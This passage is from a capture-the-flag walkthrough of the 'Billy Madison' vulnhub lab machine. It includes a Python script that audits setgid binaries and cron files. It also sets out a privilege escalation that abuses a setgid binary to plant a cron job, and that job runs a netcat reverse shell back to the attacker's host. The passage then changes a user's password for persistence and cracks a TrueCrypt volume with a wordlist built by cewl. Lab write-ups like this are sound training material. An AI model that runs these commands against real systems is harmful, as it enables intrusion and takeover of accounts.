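            kind = "setuid" if e.mode & stat.S_ISUID else "setgid"
            out.append((e.path, kind))
    return out


def cron_findings(entries):
    """Return (path, reason) for cron drop-ins a non-root user could have planted or edited."""
    out = []
    for e in entries:
        if os.path.dirname(e.path) not in CRON_DIRS or not stat.S_ISREG(e.mode):
            continue
        if e.uid != 0:
            out.append((e.path, "not owned by root (uid %d)" % e.uid))
        if e.mode & (stat.S_IWGRP | stat.S_IWOTH):
            out.append((e.path, "group/world writable"))
    return out


def walk(root="/"):
    """Yield an Entry for every file under root, skipping unreadable paths."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            yield Entry(p, st.st_mode, st.st_uid)


# Constructed sample modelled on the box: one stock set-gid binary, the
# out-of-place one, a legitimate cron job, and the cron job planted by a
# non-root user (eric, uid 1002 per the enum4linux output).
SAMPLE = [
    Entry("/usr/bin/chage", 0o102755, 0),
    Entry("/usr/local/share/sgml/donpcgd", 0o102755, 0),
    Entry("/etc/cron.hourly/apt", 0o100755, 0),
    Entry("/etc/cron.hourly/rootme", 0o100755, 1002),
]

if __name__ == "__main__":
    # Replace SAMPLE with list(walk("/")) to audit a live host.
    for finding in setid_findings(SAMPLE) + cron_findings(SAMPLE):
        print(*finding)
```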

Modifying the exploit syntax a bit, I created an hourly cron job that sends me a reverse shell through a named pipe created with mknod.

eric@BM:/usr/local/share/sgml$ touch /tmp/rootme; chmod +x /tmp/rootme; ./donpcgd /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n mknod /tmp/backpipe p; nc 192.168.72.154 8443 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe' > /etc/cron.hourly/rootme
#### mknod(/etc/cron.hourly/root,81fd,0)

I confirmed that the hourly cron job had been created, set up my listener and waited.

eric@BM:/etc/cron.hourly$ cat rootme
#!/bin/bash 
 mknod /tmp/backpipe p; nc 192.168.72.154 8443 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe

I checked back at 17 minutes past the next hour and had a hit on my listener. A root shell!

root@mrb3n:~# nc -lvnp 8443
listening on [any] 8443 ...
connect to [192.168.72.154] from (UNKNOWN) [192.168.72.155] 58066
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux BM 4.4.0-34-generic #53-Ubuntu SMP Wed Jul 27 16:06:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
python -c 'import pty;pty.spawn("/bin/bash")'

root@BM:/#

Establishing persistence

Even after obtaining a better working tty, the shell was a bit sluggish. I decided to be a bit dirty and change billy’s password, since I knew he had sudo privileges. After changing it I logged back in via SSH and things were much more stable.

root@BM:/# passwd billy
pswd billy
Enter new UNIX password: billy
Retype new UNIX password: billy

Checking out the root directory I found all of the shell scripts the author had carefully set up to troll us/keep us on track. Nicely done!

root@BM:~# ls
checkban    ebd.sh   email.sh  fwconfig.sh  ssh.sh      telnet.sh
cleanup.sh  ebd.txt  ftp.sh    ssh          startup.sh  wp.sh

PRIVATE

Moving over to the /PRIVATE directory I found a hint file as well as an unknown file which later proved to be a Truecrypt volume based on the hint “truely cracks me up”.

root@BM:/PRIVATE# ls -lah
total 1.1M
drwx------  2 root  root  4.0K Aug 21 16:45 .
drwxr-xr-x 25 root  root  4.0K Aug 20 13:59 ..
-rw-rw-r--  1 billy billy 1.0M Aug 21 16:42 BowelMovement
-rw-r--r--  1 root  root   191 Aug 21 16:45 hint.txt


root@BM:/PRIVATE# cat hint.txt 
Heh, I called the file BowelMovement because it has the same initials as
Billy Madison.  That truely cracks me up!  LOLOLOL!

I always forget the password, but it's here:

https://en.wikipedia.org/wiki/Billy_Madison

-EG

I pulled the truecrypt volume down locally and created a wordlist using cewl and the Wikipedia link provided.

root@mrb3n:~/Desktop/billymadison# cewl -v en.wikipedia.org/wiki/Billy_Madison -d 1 -w billy_madison.txt

When using cewl and Wikipedia to create wordlists we are left with lots of junk. The following command can be used to clean things up a bit.

root@mrb3n:~/Desktop/billymadison# cat billy_madison.txt | grep "\w\{7,\}" | grep -v "^wg" | head -n -50 > short_billy_madison.txt

Next I fired up truecrack against the truecrypt volume using the shiny new wordlist. 236 attempts in and we had a hit.

root@mrb3n:~/Desktop/billymadison# truecrack -t BowelMovement -w /root/rockyou.txt -v

231	inspired	NO
232	ignores		NO
233	initially	NO
234	calling		NO
235	execrable	YES
Found password:		"execrable"
Password length:	"10"
Total computations:	"236"

Now I had a password but I still had to mount the Truecrypt volume to see what the author had in store for us next. Kali Linux comes with cryptsetup which can be used to access a truecrypt container if we don’t have truecrypt installed. The following command will open the truecrypt container (after we enter the password).

root@mrb3n:~/Desktop/billymadison# cryptsetup open --type tcrypt /root/Desktop/billymadison/BowelMovement billy
Enter passphrase: 

Once open, we can mount the truecrypt container at a mountpoint of our choosing.

root@mrb3n:~/Desktop/billymadison# mount -t vfat /dev/mapper/billy /root/Desktop/billymadison/BowelMovement 

Browsing to the mountpoint I was presented with another zip file as well as a .doc file containing Billy’s final project. My heart sank for a moment, wondering what additional final password cracking challenge the author had in store. Lucky for us he was gracious enough to give up the final flag without a fight.

root@mrb3n:/media/root/4ED7-715F# unzip secret.zip 
Archive:  secret.zip
  inflating: Billy_Madison_12th_Grade_Final_Project.doc  
  inflating: THE-END.txt

The End

root@mrb3n:/media/root/4ED7-715F# cat THE-END.txt 
Congratulations!

If you're reading this, you win!

I hope you had fun.  I had an absolute blast putting this together.

I'd love to have your feedback on the box - or at least know you pwned it!

Please feel free to shoot me a tweet or email (7ms@7ms.us) and let me know with
the subject line: "Stop looking at me swan!"

Thanks much,

Brian Johnson
7 Minute Security
www.7ms.us

Billy Madison 12th Grade Final Project

Billy Madison
Final Project
Knibb High

                                       The Industrial Revolution

The Industrial Revolution to me is just like a story I know called "The Puppy Who Lost His Way." 
The world was changing, and the puppy was getting... bigger.

So, you see, the puppy was like industry. In that, they were both lost in the woods.
And nobody, especially the little boy - "society" - knew where to find 'em. 
Except that the puppy was a dog. 
But the industry, my friends, that was a revolution.

KNIBB HIGH FOOTBALL RULES!!!!!



-BM

Final thoughts

This boot2root was a ton of fun and brought me back to my childhood watching classic Adam Sandler movies. The author definitely upped the challenge from his previous Tommy Boy VM and presented us with a highly polished, well-thought-out scenario that required iterative, out-of-the-box thinking as well as chaining together a variety of tactics and tools.

Thanks and props to @7minsec for putting together another great challenge and, as always, thank you to @g0tmi1k for keeping the #vulnhub community up and running.